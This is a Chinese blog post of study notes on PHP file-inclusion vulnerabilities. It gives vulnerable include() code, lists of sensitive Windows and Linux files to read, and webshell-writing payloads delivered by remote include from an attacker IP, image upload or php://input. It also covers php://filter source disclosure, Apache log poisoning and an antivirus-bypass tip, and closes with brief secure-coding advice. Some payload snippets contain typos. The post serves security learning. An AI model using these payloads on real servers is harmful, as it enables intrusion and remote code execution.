文件包含漏洞学习笔记

最新推荐文章于 2022-03-10 17:23:36 发布
最新推荐文章于 2022-03-10 17:23:36 发布
阅读量243 收藏 2
点赞数
分类专栏: 学习笔记 文章标签: web安全 网络安全 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43872099/article/details/102907178
版权

0x00 前言

​ 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件而无需再次编写,这种调用文件的过程被称为包含。被包含的文件设置为变量,用来动态调用时,导致客户端可以调用一个恶意文件,造成文件包含漏洞。

0x01 文件包含函数

  • require:找不到被包含文件时会产生错误(E_COMPILE_ERROR),并停止脚本
  • include:找不到被包含文件时只会产生警告(E_WARNING),脚本将继续执行
  • include_once:同include,若该文件中的代码已经被包含,则不会再次包含
  • require_once:同require,若该文件中的代码已经被包含,则不会再次包含

0x02 漏洞形成条件

  • allow_url_fopen=On(本地包含)
  • allow_url_include=On(远程包含)
  • 用户可以动态控制变量

0x03 本地包含(Local File Include)

  • index.php文件中包含phpinfo.txt

    phpinfo.txt:
<?php
	phpinfo();
?>

index.php:
<?php
	include("phpinfo.txt");
?>

  • 任意文件包含

    <?php
    $filename  = $_GET['filename'];
    include($filename);
?>

    $filename可控且参数没有做任何过滤时,输入恶意文件,导致执行非预期的代码

  • 文件内容符合php语法规范,任何扩展名都可以被php解析

  • 包含非php语法规范文件时,将会暴露其源代码

0x04 远程包含(Remote File Include)

  • 任意远程文件包含
index.php:
<?php
	$filename = $_GET['page'];
	include($page);
?>

phpinfo.txt:
<?php
	phpinfo();
?>
http://www.xxer.com/index.php?page=http://192.168.31.87/fi/phpinfo.txt

0x05 文件包含利用

读取敏感文件
  • Windows系统
C:\boot.ini							     //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml   //IIS配置文件
C:\windows\repair\sam					 //存储Windows系统初次安装的密码
C:\Program Files\mysql\my.ini			  //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\windows\php.ini						 //php配置信息
C:\windows\my.ini						 //Mysql配置文件
  • UNIX/Linux系统
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf			  //apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//虛拟网站设置
/usr/local/app/php5/lib/php.ini					 //PHP相关设置
/etc/httpd/conf/httpd.conf						//apache配置文件
/etc/my.cnf	  							       //Mysql的配置文件
远程包含shell
echo.txt:
<?fputs(fopen("shell.php","w"),"<?php eval_($POST['0xdawn'];)?>")?>

访问 http://www.xxer.com/index.php?page=http://192.168.31.87/echo.txt
将会在index.php所在目录下生成shell.php

本地包含+文件上传
shell.jpg:
<?fputs(fopen("shell.php","w"),"<?php eval_($POST['0xdawn'];)?>")?>

上传一句话木马图片到服务器,路径为/uploadfile/shell.jpg

访问 http://www.xxer.com/index.php?page=./uploadfile/shell.jpg
将会在index.php所在目录下生成shell.php

php封装协议
名称含义
file://访问本地文件
http://访问http网址
ftp://访问FTP URL
php://访问输入/输出流
zlib://压缩流
data://数据
ssh2://secure shell 2
expect://处理交互式流
glob://查找匹配的文件路径
  • 读取php文件
http://www.xxer.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

得到base64加密后的php源代码

  • 写入php文件
http://www.xxer.com/index.php?page=php://input
POST:<?fputs(fopen("shell.php"),"<?php eval($POST['0xdawn']);?>")?>

在index.php目录下生成shell.php

  • 包含apache日志文件

Apache运行后默认生成两个日志文件,access.log(访问日志)和error.log(错误日志)

访问url:http://www.xxer.com/<?php phpinfo();?>,Apache记录请求并写入access.log文件

  • 绕WAF

上传一句话木马图片再在php文件中包含这个木马图片,可以绕过部分杀软

0x06 安全编写包含

  • 严格判断包含中的参数是否外部可控
  • 限制被包含的文件只能在某一文件夹中,进制目录跳转字符
  • 验证被包含的文件是否在白名单中
  • 尽量不使用动态包含
0xdawn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php伪协议语法,php文件包含漏洞(input与filter)
weixin_39881167的博客
03-10 1646
php://inputphp://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。php://filter协议协议语法:php://filter:/=php://filter 的 参数列表read      ...
网络安全笔记 -- 文件操作(文件包含漏洞
最新发布
swy66的博客
09-12 3376
文件操作(文件包含漏洞
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2723
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
文件包含漏洞(include)-学习笔记
小龙在线
08-21 5713
简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP Stream(流) 属性 支持 受限于 allow_url_fopen NO 受限于allow_url_include 仅 php://input、 php://s
详解文件包含漏洞
bangyan3903的博客
08-15 575
文件包含漏洞触发前提: allow_url_fopen = On && allow_url_include = Off 此时才可以触发本地文件包含漏洞 allow_url_fopen = On && allow_url_include = On 此时才可以触发远程文件包含漏洞 其中,allow_url_fopen一直都是默认开...
Webgoat学习笔记.zip
03-12
3. 文件包含漏洞:研究如何通过文件包含漏洞执行任意代码,学习限制文件包含功能,使用安全的相对路径或白名单机制来防范。 4. 认证与会话管理:掌握弱密码策略、会话固定、会话劫持等问题,学习使用强认证机制和...
渗透学习笔记
12-30
这份名为"渗透学习笔记"的压缩包包含了多个文本文件,涵盖了渗透测试中的一些关键领域,如MySQL注入、CMS探测、数据库探测等。以下是这些知识点的详细说明: 1. **MySQL手注大全.txt**: MySQL注入是常见的Web应用...
蓝牙学习笔记
08-05
其中,链路层负责设备之间的连接和数据传输,网络层处理广播和多播,会话层管理不同服务的访问,应用层则包含各种具体的应用规范,如A2DP(高级音频分布配置文件)用于音频流,GATT(通用属性配置文件)用于BLE的...
安全测试学习笔记.pdf
05-28
应对用户上传的文件内容进行审查,防止包含恶意代码。 6. **Session管理**: Session是跟踪用户状态的重要手段,但存在被劫持或篡改的风险。Session数据可以存储在cookie、URL参数或服务器端。存储在cookie中时应...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
4. **图片马**:将Webshell代码嵌入到图片中,配合文件包含漏洞进行利用。 5. **条件竞争**:在高并发环境下,利用后台处理流程中的时间差,使得恶意文件在被删除之前得以保存。 **漏洞发现**常见于用户上传头像、...
文件包含漏洞总结
06-10 396
1、定义 文件包含就是一个文件里面包含另外一个文件。一开始接触的时候是因为php里面,但是查找了一些资料这个存在在很多语言里面。 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web
web渗透-问件包含漏洞
weixin_45540964的博客
11-25 78
(1) .概述 程序开发人员通常会把可重复使用的函数写在单个文件中 在使用某个函数的时候,直接调用此文件,无需再次编写, 这种调用文件的过程称为文件包含 程序开发人员都希望代码更加灵活,所有通常会把 被包含的文件设置为变量,进行动态调用,正由于这阵灵活性 导致客户端可以调用任意文件,造成文件包含漏洞 (2) .php中文件包含 函数 区别 include() 文件包含失败时会产生警告 ,脚本继续执行 include_once() 与inlude()
文件包含漏洞 笔记
qq_41453632的博客
11-23 219
文件包含漏洞: c:  #include&lt;stdio.h&gt; php: include"config.php" jsp:&lt;include file ="header.jsp" /&gt; index.php的代码: &lt;?php                            if(@$_GET[xss]) {                             @...
网络安全文件包含漏洞总结
kali_Ma的博客
03-10 2289
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
文件包含漏洞
2ed
04-15 912
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件, 而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居...
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 522
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
[渗透笔记] 文件包含漏洞
H4ppyD0g的博客
08-21 496
文件包含漏洞 程序开发时可能会有一段代码重复使用,为了方便,把它写入到另一个文件中,把这个被包含的文件设置为变量,用来进行调用,调用后就会执行这个文件中的代码,如果这个文件内容是特殊的内容,就会形成漏洞,叫文件包含漏洞文件包含分为本地包含和远程包含。 下面以php包含为例介绍文件包含漏洞。 php中的四个文件包含函数 include() 找不到被包含的文件时产生警告,脚本继续执行 inclu...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值